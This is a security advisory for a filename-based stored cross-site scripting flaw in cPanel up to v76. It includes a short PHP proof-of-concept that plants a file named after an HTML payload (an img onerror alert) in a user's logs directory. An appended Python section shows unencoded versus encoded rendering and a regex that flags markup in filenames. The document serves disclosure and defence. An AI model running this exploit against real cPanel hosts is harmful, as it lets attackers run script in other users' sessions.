[+] Title: cPanel Filename Based Stored XSS <= v76
[+] Author: Numan OZDEMIR
[+] Vendor Homepage: cpanel.com
[+] Version: Up to v76.
[+] Discovered by Numan OZDEMIR in InfinitumIT Labs
[+] [email protected] - [email protected]
[~] Description:
An attacker can run JavaScript code on this page:
http://ip:2082/cpsessXXXXXXXXXX/frontend/THEME/raw/index.html
[~] How to Reproduce:
Create a file whose name is your payload in the /home/user/logs directory,
or run this PHP exploit:
<center>
<?php
// Creates an empty file named after the submitted payload in the ~/logs
// directory of the account this script runs as; the raw log page later
// renders that filename without HTML encoding.
$p = isset($_POST['payload']) ? $_POST['payload'] : '';
$x = get_current_user();           // account name owning this script
$dir = "/home/".$x."/logs/";
if($_POST){
    if(touch($dir.$p)){
        die('
Successfully exploited. Visit <br>
http://ip:2082/cpsessXXXXXXXXXX/frontend/THEME/raw/index.html
        ');
    }else{
        die('An error occurred.');
    }
}else{
    echo 'Enter your payload:
<form action="" method="post"><input type="text" name="payload" placeholder="<img src onerror=alert(2)>">
<input type="submit" value=">>"></form>';
}
// end of the script.
?>
</center>
Note: You can't create a file whose name contains the / (slash) character with this exploit.
This vulnerability is disclosed with the cPanel team's confirmation.
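The root cause here is a directory listing that echoes filenames into HTML without output encoding. The following Python is an added example, not part of this advisory and not cPanel's code: it shows the unencoded rendering beside the encoded one, and a triage check that flags filenames in a logs directory that carry markup. The sample filenames are constructed, and scan_directory is a hypothetical helper for running the same check on a real path.

```python
import html
import os
import re
from urllib.parse import quote

# Constructed sample listing: two ordinary cPanel-style log names and one
# filename carrying the markup payload from the advisory.
SAMPLE_NAMES = [
    "example.com-Feb-2019.gz",
    "error_log",
    "<img src onerror=alert(2)>",
]

# Characters and fragments that have no business in a log filename and that a
# browser would interpret if the name were echoed unencoded.
_SUSPICIOUS = re.compile(r'[<>"\'&]|javascript:|\bon[a-z]+\s*=', re.IGNORECASE)


def render_listing_unsafe(names):
    """Mirror of the bug class: filenames concatenated straight into HTML."""
    rows = "".join(f'<li><a href="{n}">{n}</a></li>' for n in names)
    return f"<ul>{rows}</ul>"


def render_listing_safe(names):
    """Hardened form: HTML-encode the visible text, percent-encode the URL part."""
    rows = "".join(
        f'<li><a href="{quote(n, safe="")}">{html.escape(n, quote=True)}</a></li>'
        for n in names
    )
    return f"<ul>{rows}</ul>"


def find_suspicious_filenames(names):
    """Return the filenames a defender would want to flag during triage."""
    return [n for n in names if _SUSPICIOUS.search(n)]


def scan_directory(path):
    """Hypothetical helper: apply the check to a real directory such as ~/logs."""
    return find_suspicious_filenames(os.listdir(path))


if __name__ == "__main__":
    print("flagged:", find_suspicious_filenames(SAMPLE_NAMES))
    print(render_listing_safe(SAMPLE_NAMES))
```

Encoding at the point of output is what removes the bug; the filename scan is only a detection aid for finding files that were planted before the fix was applied.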
// for secure days...